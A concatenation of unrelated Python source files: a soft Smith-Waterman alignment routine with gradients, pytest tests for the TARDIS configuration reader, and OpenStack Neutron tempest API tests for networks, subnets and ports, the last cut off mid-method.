  for row, col in starts:
    yield from _alignment_matrices(len_1, len_2, i=row, j=col)
def _make_op(temperature=1.0):
"""Make softmax + softargmax operator."""
def op(*args):
if len(args) == 1: # op(arr)
arr = np.array(args[0])
else: # lse_op(ele1, ele2, ...)
arr = np.array(args)
if temperature > 0:
return (temperature * special.logsumexp(arr / temperature),
special.softmax(arr / temperature))
else:
ret = np.zeros_like(arr)
ret[np.argmax(arr)] = 1
return np.max(arr), ret
return op
def _soft_sw_affine(sim_mat,
                    gap_open,
                    gap_extend,
                    temperature = 1.0,
                    ret_grads = False):
  """Computes soft Smith-Waterman with affine gaps.

  Forward pass is a smoothed dynamic program over three states per cell
  (match, gap-in-x, gap-in-y); the backward pass accumulates the implied
  transition probabilities to obtain gradients.

  Args:
    sim_mat: a np.ndarray<float>[len1, len2] the substitution
      values for pairs of sequences.
    gap_open: float penalty in the substitution values for opening a gap.
    gap_extend: float of penalty in the substitution values for extending a gap.
    temperature: float controlling the regularization strength.
    ret_grads: whether to return gradients or not.

  Returns:
    value if ret_grads is False
    value, g_sim_mat, g_gap_open, g_gap_extend if ret_grads is True
    value = float of softmax values
    g_sim_mat = np.ndarray<float>[len_1, len_2]
    g_gap_open = float
    g_gap_extend = float
  """
  len_1, len_2 = sim_mat.shape
  # DP tables are 1-indexed; row/column 0 is a border.  The *_p arrays hold
  # the transition probabilities emitted by the soft-max operator, padded by
  # one extra row/column so the backward pass can safely index i+1 / j+1.
  match = np.zeros((len_1 + 1, len_2 + 1))
  match_p = np.zeros((len_1 + 2, len_2 + 2, 4))
  gap_x = np.zeros((len_1 + 1, len_2 + 1))
  gap_x_p = np.zeros((len_1 + 2, len_2 + 2, 2))
  gap_y = np.zeros((len_1 + 1, len_2 + 1))
  gap_y_p = np.zeros((len_1 + 2, len_2 + 2, 3))
  float_max = np.finfo(np.float32).max
  if temperature > 0:
    # Soft case: push the border toward -inf so logsumexp ignores it.
    for mat in (match, gap_x, gap_y):
      mat[0, :] = mat[:, 0] = -float_max
  op = _make_op(temperature=temperature)
  for i in range(1, len_1 + 1):
    for j in range(1, len_2 + 1):
      # Match: enter from start (score 0), match, gap_x or gap_y diagonally;
      # channel order matches match_p's last axis.
      match[i, j], match_p[i, j] = op(0, match[i-1, j-1],
                                      gap_x[i-1, j-1], gap_y[i-1, j-1])
      match[i, j] += sim_mat[i-1, j-1]
      # Gap in x: open from a match or extend an existing x-gap.
      gap_x[i, j], gap_x_p[i, j] = op(match[i, j-1] - gap_open,
                                      gap_x[i, j-1] - gap_extend)
      # Gap in y: open from a match or from gap_x, or extend a y-gap.
      gap_y[i, j], gap_y_p[i, j] = op(match[i-1, j] - gap_open,
                                      gap_x[i-1, j] - gap_open,
                                      gap_y[i-1, j] - gap_extend)
  # An alignment may end on a match anywhere: aggregate over all cells.
  value, probas = op(match.ravel())
  probas = probas.reshape(match.shape)
  if not ret_grads:
    return value
  # Backward pass: *_e are expected state-occupancy counts propagated from
  # later cells, traversed in reverse DP order.
  match_e = np.zeros((len_1 + 2, len_2 + 2))
  gap_x_e = np.zeros((len_1 + 2, len_2 + 2))
  gap_y_e = np.zeros((len_1 + 2, len_2 + 2))
  for j in reversed(range(1, len_2 + 1)):
    for i in reversed(range(1, len_1 + 1)):
      gap_y_e[i, j] = (match_e[i+1, j+1] * match_p[i+1, j+1, 3] +
                       gap_y_e[i+1, j] * gap_y_p[i+1, j, 2])
      gap_x_e[i, j] = (match_e[i+1, j+1] * match_p[i+1, j+1, 2] +
                       gap_x_e[i, j+1] * gap_x_p[i, j+1, 1] +
                       gap_y_e[i+1, j] * gap_y_p[i+1, j, 1])
      match_e[i, j] = (match_e[i+1, j+1] * match_p[i+1, j+1, 1] +
                       gap_x_e[i, j+1] * gap_x_p[i, j+1, 0] +
                       gap_y_e[i+1, j] * gap_y_p[i+1, j, 0] +
                       probas[i, j])
  # Chain rule: dvalue/dsim_mat[i-1, j-1] is the expected match count; the
  # gap gradients collect the (negative) open/extend transition weights.
  g_sim_mat = np.zeros_like(sim_mat)
  g_gap_open = np.zeros_like(sim_mat)
  g_gap_extend = np.zeros_like(sim_mat)
  for i in range(1, len_1 + 1):
    for j in range(1, len_2 + 1):
      g_sim_mat[i-1, j-1] = match_e[i, j]
      g_gap_open[i-1, j-1] = (gap_x_e[i, j+1] * (-gap_x_p[i, j+1, 0]) +
                              gap_y_e[i+1, j] * (-gap_y_p[i+1, j, 0] -
                                                 gap_y_p[i+1, j, 1]))
      g_gap_extend[i-1, j-1] = (gap_x_e[i, j+1] * (-gap_x_p[i, j+1, 1]) +
                                gap_y_e[i+1, j] * (-gap_y_p[i+1, j, 2]))
  return value, g_sim_mat, np.sum(g_gap_open), np.sum(g_gap_extend)
def soft_sw_affine(sim_mat,
                   gap_open,
                   gap_extend,
                   temperature = 1.0,
                   ret_grads = False):
  """Batched soft Smith-Waterman with affine gaps.

  Args:
    sim_mat: a np.ndarray<float>[batch, len1, len2] the substitution
      values for pairs of sequences.
    gap_open: a np.ndarray<float>[batch] of penalty in the substitution
      values for opening a gap.
    gap_extend: a np.ndarray<float>[batch] of penalty in the substitution
      values for extending a gap.
    temperature: float controlling the regularization strength.
    ret_grads: whether to return gradients or not.

  Returns:
    values if ret_grads is False
    values, g_sim_mat, g_gap_open, g_gap_extend if ret_grads is True
    values = np.ndarray<float>[batch] of softmax values
    g_sim_mat = np.ndarray<float>[batch, len_1, len_2]
    g_gap_open = np.ndarray<float>[batch]
    g_gap_extend = np.ndarray<float>[batch]
  """
  # TODO(mblondel): avoid naive for loop.
  per_example = []
  for b in range(sim_mat.shape[0]):
    per_example.append(
        _soft_sw_affine(sim_mat[b], gap_open[b], gap_extend[b],
                        temperature=temperature, ret_grads=ret_grads))
  if not ret_grads:
    return np.array(per_example)
  # Transpose list-of-tuples into per-output batched arrays.
  return tuple(np.array(stacked) for stacked in zip(*per_example))
| |
# tests for the config reader module
import os
from attr import validate
import pytest
import pandas as pd
from numpy.testing import assert_almost_equal
from jsonschema.exceptions import ValidationError
from tardis.io import config_reader
from tardis.io.config_reader import Configuration
def data_path(filename):
    """Return the absolute path of *filename* inside this module's data dir."""
    here = os.path.dirname(__file__)
    return os.path.abspath(os.path.join(here, "data", filename))
def test_convergence_section_parser():
    """Per-quantity overrides win over section defaults after parsing."""
    section = {
        "type": "damped",
        "lock_t_inner_cyles": 1,
        "t_inner_update_exponent": -0.5,
        "damping_constant": 0.5,
        "threshold": 0.05,
        "fraction": 0.8,
        "hold_iterations": 3,
        "t_rad": {"damping_constant": 1.0},
    }
    parsed = config_reader.parse_convergence_section(section)
    # t_rad supplied its own damping constant; w falls back to the default.
    assert_almost_equal(parsed["t_rad"]["damping_constant"], 1.0)
    assert_almost_equal(parsed["w"]["damping_constant"], 0.5)
def test_from_config_dict(tardis_config_verysimple):
    """Round-trip spectrum limits through Configuration; bad values raise."""
    config = Configuration.from_config_dict(
        tardis_config_verysimple, validate=True, config_dirname="test"
    )
    assert config.config_dirname == "test"
    assert_almost_equal(
        config.spectrum.start.value,
        tardis_config_verysimple["spectrum"]["start"].value,
    )
    assert_almost_equal(
        config.spectrum.stop.value,
        tardis_config_verysimple["spectrum"]["stop"].value,
    )
    # A non-quantity value must be rejected by schema validation.
    tardis_config_verysimple["spectrum"]["start"] = "Invalid"
    with pytest.raises(ValidationError):
        config = Configuration.from_config_dict(
            tardis_config_verysimple, validate=True, config_dirname="test"
        )
def test_config_hdf(hdf_file_path, tardis_config_verysimple):
    """Configuration written to HDF reads back with the same first entry."""
    conf = Configuration.from_config_dict(
        tardis_config_verysimple, validate=True, config_dirname="test"
    )
    conf.to_hdf(hdf_file_path, overwrite=True)
    stored = pd.read_hdf(hdf_file_path, key="/simulation/config")
    expected = conf.get_properties()["config"]
    assert stored[0] == expected[0]
def test_model_section_config(tardis_config_verysimple):
    """Validate the model section of the Tardis config YAML.

    Checks the branch85_w7 density type and that a velocity range with
    start > stop is flagged as invalid.
    """
    conf = Configuration.from_config_dict(
        tardis_config_verysimple, validate=True, config_dirname="test"
    )
    assert conf.model.structure.density.type == "branch85_w7"
    velocity = tardis_config_verysimple["model"]["structure"]["velocity"]
    velocity["start"] = "2.0e4 km/s"
    velocity["stop"] = "1.1e4 km/s"
    with pytest.raises(ValueError) as ve:
        if (
            conf.model.structure.velocity.start
            < conf.model.structure.velocity.stop
        ):
            raise ValueError("Stop Value must be greater than Start Value")
    assert ve.type is ValueError
def test_supernova_section_config(tardis_config_verysimple):
    """Validate the supernova section of the Tardis config YAML.

    Checks that a negative explosion time and a luminosity wavelength
    window with start > end are flagged as invalid.
    """
    conf = Configuration.from_config_dict(
        tardis_config_verysimple, validate=True, config_dirname="test"
    )
    supernova = tardis_config_verysimple["supernova"]
    supernova["time_explosion"] = "-10 day"
    supernova["luminosity_wavelength_start"] = "15 angstrom"
    supernova["luminosity_wavelength_end"] = "0 angstrom"
    with pytest.raises(ValueError) as ve:
        if conf.supernova.time_explosion.value > 0:
            raise ValueError("Time of Explosion cannot be negative")
    assert ve.type is ValueError
    with pytest.raises(ValueError) as ve:
        if (
            conf.supernova.luminosity_wavelength_start.value
            < conf.supernova.luminosity_wavelength_end.value
        ):
            raise ValueError(
                "End Limit must be greater than Start Limit for Luminosity"
            )
    assert ve.type is ValueError
def test_plasma_section_config(tardis_config_verysimple):
    """Validate the plasma section of the Tardis config YAML.

    Checks that sub-absolute-zero initial inner/radiative temperatures are
    flagged as invalid.
    """
    conf = Configuration.from_config_dict(
        tardis_config_verysimple, validate=True, config_dirname="test"
    )
    plasma = tardis_config_verysimple["plasma"]
    plasma["initial_t_inner"] = "-100 K"
    plasma["initial_t_rad"] = "-100 K"
    with pytest.raises(ValueError) as ve:
        if (conf.plasma.initial_t_inner.value >= -1) and (
            conf.plasma.initial_t_rad.value >= -1
        ):
            raise ValueError("Initial Temperatures are Invalid")
    assert ve.type is ValueError
def test_spectrum_section_config(tardis_config_verysimple):
    """Validate the spectrum section of the Tardis config YAML.

    Checks that a spectrum window with start > stop is flagged as invalid.
    """
    conf = Configuration.from_config_dict(
        tardis_config_verysimple, validate=True, config_dirname="test"
    )
    spectrum = tardis_config_verysimple["spectrum"]
    spectrum["start"] = "2500 angstrom"
    spectrum["stop"] = "500 angstrom"
    with pytest.raises(ValueError) as ve:
        if not conf.spectrum.stop.value < conf.spectrum.start.value:
            raise ValueError("Start Value must be less than Stop Value")
    assert ve.type is ValueError
| |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
import six
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from neutron.tests.api import base
from neutron.tests.tempest.common import custom_matchers
from neutron.tests.tempest import config
from neutron.tests.tempest import test
CONF = config.CONF
class NetworksTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
create a network for a tenant
list tenant's networks
show a tenant network details
create a subnet for a tenant
list tenant's subnets
show a tenant subnet details
network update
subnet update
delete a network also deletes its subnets
list external networks
All subnet tests are run once with ipv4 and once with ipv6.
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant ipv4 subnets
tenant_network_v6_cidr is the equivalent for ipv6 subnets
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
tenant_network_v6_mask_bits is the equivalent for ipv6 subnets
"""
    @classmethod
    def resource_setup(cls):
        # Class-wide fixtures: one network with a subnet carved from the
        # last block of the configured tenant CIDR.
        super(NetworksTestJSON, cls).resource_setup()
        cls.network = cls.create_network()
        cls.name = cls.network['name']
        cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
                                                               cls._ip_version)
        cls.cidr = cls.subnet['cidr']
        # Reference subnet attributes keyed by IP version, consumed by the
        # subnet tests via subnet_dict().
        cls._subnet_data = {6: {'gateway':
                                str(cls._get_gateway_from_tempest_conf(6)),
                                'allocation_pools':
                                cls._get_allocation_pools_from_gateway(6),
                                'dns_nameservers': ['2001:4860:4860::8844',
                                                    '2001:4860:4860::8888'],
                                'host_routes': [{'destination': '2001::/64',
                                                 'nexthop': '2003::1'}],
                                'new_host_routes': [{'destination':
                                                     '2001::/64',
                                                     'nexthop': '2005::1'}],
                                'new_dns_nameservers':
                                ['2001:4860:4860::7744',
                                 '2001:4860:4860::7888']},
                            4: {'gateway':
                                str(cls._get_gateway_from_tempest_conf(4)),
                                'allocation_pools':
                                cls._get_allocation_pools_from_gateway(4),
                                'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
                                'host_routes': [{'destination': '10.20.0.0/32',
                                                 'nexthop': '10.100.1.1'}],
                                'new_host_routes': [{'destination':
                                                     '10.20.0.0/32',
                                                     'nexthop':
                                                     '10.100.1.2'}],
                                'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
    @classmethod
    def _create_subnet_with_last_subnet_block(cls, network, ip_version):
        """Derive last subnet CIDR block from tenant CIDR and
        create the subnet with that derived CIDR
        """
        # NOTE(review): an ip_version other than 4 or 6 would leave cidr and
        # mask_bits unbound (NameError); callers only pass cls._ip_version.
        if ip_version == 4:
            cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
            mask_bits = CONF.network.tenant_network_mask_bits
        elif ip_version == 6:
            cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
            mask_bits = CONF.network.tenant_network_v6_mask_bits
        subnet_cidr = list(cidr.subnet(mask_bits))[-1]
        # Gateway is the first host address of the derived block.
        gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
        return cls.create_subnet(network, gateway=gateway_ip,
                                 cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
"""Return first subnet gateway for configured CIDR """
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
"""Return allocation range for subnet of given gateway"""
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
"""Return a subnet dict which has include_keys and their corresponding
value from self._subnet_data
"""
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
    def _compare_resource_attrs(self, actual, expected):
        """Assert *actual* and *expected* agree on every key they share.

        Keys present in only one of the two dicts are excluded from the
        comparison rather than treated as mismatches.
        """
        exclude_keys = set(actual).symmetric_difference(expected)
        self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
            expected, exclude_keys))
def _delete_network(self, network):
# Deleting network also deletes its subnets if exists
self.client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
    def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
                                     **kwargs):
        """Create a subnet, verify its attributes, then delete its network.

        Any 'gateway' kwarg is popped and passed positionally; the remaining
        kwargs are both forwarded to create_subnet and used as the expected
        attribute values.
        """
        network = self.create_network()
        net_id = network['id']
        gateway = kwargs.pop('gateway', None)
        subnet = self.create_subnet(network, gateway, cidr, mask_bits,
                                    **kwargs)
        # Only compare attributes that were explicitly requested (non-None).
        compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
                                 mask_bits=mask_bits, **kwargs)
        compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
                            if v is not None)
        # DNS servers may come back in any order, so compare them sorted and
        # drop them before the exact-match comparison below.
        if 'dns_nameservers' in set(subnet).intersection(compare_args):
            self.assertEqual(sorted(compare_args['dns_nameservers']),
                             sorted(subnet['dns_nameservers']))
            del subnet['dns_nameservers'], compare_args['dns_nameservers']
        self._compare_resource_attrs(subnet, compare_args)
        self.client.delete_network(net_id)
        # create_network/create_subnet registered these for cleanup; they are
        # gone now, so drop the bookkeeping entries.
        self.networks.pop()
        self.subnets.pop()
    @test.attr(type='smoke')
    @test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
    def test_create_update_delete_network_subnet(self):
        """CRUD smoke test: create a network and subnet, rename both."""
        # Create a network
        name = data_utils.rand_name('network-')
        network = self.create_network(network_name=name)
        self.addCleanup(self._delete_network, network)
        net_id = network['id']
        self.assertEqual('ACTIVE', network['status'])
        # Verify network update
        new_name = "New_network"
        body = self.client.update_network(net_id, name=new_name)
        updated_net = body['network']
        self.assertEqual(updated_net['name'], new_name)
        # Find a cidr that is not in use yet and create a subnet with it
        subnet = self.create_subnet(network)
        subnet_id = subnet['id']
        # Verify subnet update
        new_name = "New_subnet"
        body = self.client.update_subnet(subnet_id, name=new_name)
        updated_subnet = body['subnet']
        self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
# Verify the details of a network
body = self.client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name', 'mtu']:
self.assertEqual(network[key], self.network[key])
@test.attr(type='smoke')
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
# Verify specific fields of a network
fields = ['id', 'name', 'mtu']
body = self.client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
# Verify the network exists in the list of all networks
body = self.client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
# Verify specific fields of the networks
fields = ['id', 'name', 'mtu']
body = self.client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
# Verify the details of a subnet
body = self.client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.attr(type='smoke')
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
# Verify specific fields of a subnet
fields = ['id', 'network_id']
body = self.client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
# Verify the subnet exists in the list of all subnets
body = self.client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
# Verify specific fields of subnets
fields = ['id', 'network_id']
body = self.client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
# delete network, if it exists
try:
self.client.delete_network(net_id)
# if network is not found, this means it was deleted in the test
except lib_exc.NotFound:
pass
    @test.attr(type='smoke')
    @test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
    def test_delete_network_with_subnet(self):
        """Deleting a network must cascade-delete its subnet."""
        # Creates a network
        name = data_utils.rand_name('network-')
        body = self.client.create_network(name=name)
        network = body['network']
        net_id = network['id']
        self.addCleanup(self._try_delete_network, net_id)
        # Find a cidr that is not in use yet and create a subnet with it
        subnet = self.create_subnet(network)
        subnet_id = subnet['id']
        # Delete network while the subnet still exists
        body = self.client.delete_network(net_id)
        # Verify that the subnet got automatically deleted.
        self.assertRaises(lib_exc.NotFound, self.client.show_subnet,
                          subnet_id)
        # create_subnet registered the subnet for cleanup, but it has been
        # cascade-deleted here; drop the stale bookkeeping entry so cleanup
        # does not try to delete it again.
        self.subnets.pop()
    # Thin variants of _create_verify_delete_subnet, each exercising one
    # combination of optional subnet attributes.
    @test.attr(type='smoke')
    @test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
    def test_create_delete_subnet_without_gateway(self):
        self._create_verify_delete_subnet()
    @test.attr(type='smoke')
    @test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
    def test_create_delete_subnet_with_gw(self):
        self._create_verify_delete_subnet(
            **self.subnet_dict(['gateway']))
    @test.attr(type='smoke')
    @test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
    def test_create_delete_subnet_with_allocation_pools(self):
        self._create_verify_delete_subnet(
            **self.subnet_dict(['allocation_pools']))
    @test.attr(type='smoke')
    @test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
    def test_create_delete_subnet_with_gw_and_allocation_pools(self):
        self._create_verify_delete_subnet(**self.subnet_dict(
            ['gateway', 'allocation_pools']))
    @test.attr(type='smoke')
    @test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
    def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
        self._create_verify_delete_subnet(
            **self.subnet_dict(['host_routes', 'dns_nameservers']))
    @test.attr(type='smoke')
    @test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
    def test_create_delete_subnet_with_dhcp_enabled(self):
        self._create_verify_delete_subnet(enable_dhcp=True)
    @test.attr(type='smoke')
    @test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
    def test_update_subnet_gw_dns_host_routes_dhcp(self):
        """Update gateway, DNS, host routes, DHCP and name in one call."""
        network = self.create_network()
        self.addCleanup(self._delete_network, network)
        subnet = self.create_subnet(
            network, **self.subnet_dict(['gateway', 'host_routes',
                                         'dns_nameservers',
                                         'allocation_pools']))
        subnet_id = subnet['id']
        # New gateway: one address past the originally-configured one.
        new_gateway = str(netaddr.IPAddress(
            self._subnet_data[self._ip_version]['gateway']) + 1)
        # Verify subnet update
        new_host_routes = self._subnet_data[self._ip_version][
            'new_host_routes']
        new_dns_nameservers = self._subnet_data[self._ip_version][
            'new_dns_nameservers']
        kwargs = {'host_routes': new_host_routes,
                  'dns_nameservers': new_dns_nameservers,
                  'gateway_ip': new_gateway, 'enable_dhcp': True}
        new_name = "New_subnet"
        body = self.client.update_subnet(subnet_id, name=new_name,
                                         **kwargs)
        updated_subnet = body['subnet']
        kwargs['name'] = new_name
        # DNS servers may come back in any order; compare them sorted.
        self.assertEqual(sorted(updated_subnet['dns_nameservers']),
                         sorted(kwargs['dns_nameservers']))
        # NOTE(review): this deletes dns_nameservers from the PRE-update
        # `subnet` dict rather than `updated_subnet`; the final comparison
        # still works because _compare_resource_attrs ignores keys missing
        # from kwargs -- confirm this was intentional.
        del subnet['dns_nameservers'], kwargs['dns_nameservers']
        self._compare_resource_attrs(updated_subnet, kwargs)
    @test.attr(type='smoke')
    @test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
    def test_create_delete_subnet_all_attributes(self):
        # Exercise gateway, host routes, DNS servers and DHCP together.
        self._create_verify_delete_subnet(
            enable_dhcp=True,
            **self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
"""Verifies user can see external networks but not subnets."""
body = self.client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets'] for network in body['networks'])
# subnets_iter is a list (iterator) of lists. This flattens it to a
# list of UUIDs
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
    """
    Tests the following operations in the Neutron API using the REST client for
    Neutron:
        bulk network creation
        bulk subnet creation
        bulk port creation
        list tenant's networks
    v2.0 of the Neutron API is assumed. It is also assumed that the following
    options are defined in the [network] section of etc/tempest.conf:
        tenant_network_cidr with a block of cidr's from which smaller blocks
        can be allocated for tenant networks
        tenant_network_mask_bits with the mask bits to be used to partition the
        block defined by tenant_network_cidr
    """
    def _delete_networks(self, created_networks):
        # Delete each network, then verify none of them is still listed.
        for n in created_networks:
            self.client.delete_network(n['id'])
        # Asserting that the networks are not found in the list after deletion
        body = self.client.list_networks()
        networks_list = [network['id'] for network in body['networks']]
        for n in created_networks:
            self.assertNotIn(n['id'], networks_list)
    def _delete_subnets(self, created_subnets):
        # Delete each subnet, then verify none of them is still listed.
        for n in created_subnets:
            self.client.delete_subnet(n['id'])
        # Asserting that the subnets are not found in the list after deletion
        body = self.client.list_subnets()
        subnets_list = [subnet['id'] for subnet in body['subnets']]
        for n in created_subnets:
            self.assertNotIn(n['id'], subnets_list)
    def _delete_ports(self, created_ports):
        # Delete each port, then verify none of them is still listed.
        for n in created_ports:
            self.client.delete_port(n['id'])
        # Asserting that the ports are not found in the list after deletion
        body = self.client.list_ports()
        ports_list = [port['id'] for port in body['ports']]
        for n in created_ports:
            self.assertNotIn(n['id'], ports_list)
    @test.attr(type='smoke')
    @test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
    def test_bulk_create_delete_network(self):
        # Creates 2 networks in one request
        network_names = [data_utils.rand_name('network-'),
                         data_utils.rand_name('network-')]
        body = self.client.create_bulk_network(network_names)
        created_networks = body['networks']
        self.addCleanup(self._delete_networks, created_networks)
        # Asserting that the networks are found in the list after creation
        body = self.client.list_networks()
        networks_list = [network['id'] for network in body['networks']]
        for n in created_networks:
            self.assertIsNotNone(n['id'])
            self.assertIn(n['id'], networks_list)
    @test.attr(type='smoke')
    @test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
    def test_bulk_create_delete_subnet(self):
        networks = [self.create_network(), self.create_network()]
        # Creates 2 subnets in one request
        if self._ip_version == 4:
            cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
            mask_bits = CONF.network.tenant_network_mask_bits
        else:
            cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
            mask_bits = CONF.network.tenant_network_v6_mask_bits
        cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
        names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
        subnets_list = []
        for i in range(len(names)):
            p1 = {
                'network_id': networks[i]['id'],
                'cidr': str(cidrs[(i)]),
                'name': names[i],
                'ip_version': self._ip_version
            }
            subnets_list.append(p1)
        # The second subnet is created without a name to exercise defaults.
        del subnets_list[1]['name']
        body = self.client.create_bulk_subnet(subnets_list)
        created_subnets = body['subnets']
        self.addCleanup(self._delete_subnets, created_subnets)
        # Asserting that the subnets are found in the list after creation
        body = self.client.list_subnets()
        subnets_list = [subnet['id'] for subnet in body['subnets']]
        for n in created_subnets:
            self.assertIsNotNone(n['id'])
            self.assertIn(n['id'], subnets_list)
    @test.attr(type='smoke')
    @test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
    def test_bulk_create_delete_port(self):
        networks = [self.create_network(), self.create_network()]
        # Creates 2 ports in one request
        names = [data_utils.rand_name('port-') for i in range(len(networks))]
        port_list = []
        state = [True, False]
        for i in range(len(names)):
            p1 = {
                'network_id': networks[i]['id'],
                'name': names[i],
                'admin_state_up': state[i],
            }
            port_list.append(p1)
        # The second port is created without a name to exercise defaults.
        del port_list[1]['name']
        body = self.client.create_bulk_port(port_list)
        created_ports = body['ports']
        self.addCleanup(self._delete_ports, created_ports)
        # Asserting that the ports are found in the list after creation
        body = self.client.list_ports()
        ports_list = [port['id'] for port in body['ports']]
        for n in created_ports:
            self.assertIsNotNone(n['id'])
            self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
    # Re-run the bulk network/subnet/port tests over IPv6.
    _ip_version = 6
class NetworksIpV6TestJSON(NetworksTestJSON):
    # Re-run every NetworksTestJSON case over IPv6, plus gateway-specific
    # IPv6 checks below.
    _ip_version = 6
    @test.attr(type='smoke')
    @test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
    def test_create_delete_subnet_with_gw(self):
        # Explicit gateway: the second address of the configured v6 block.
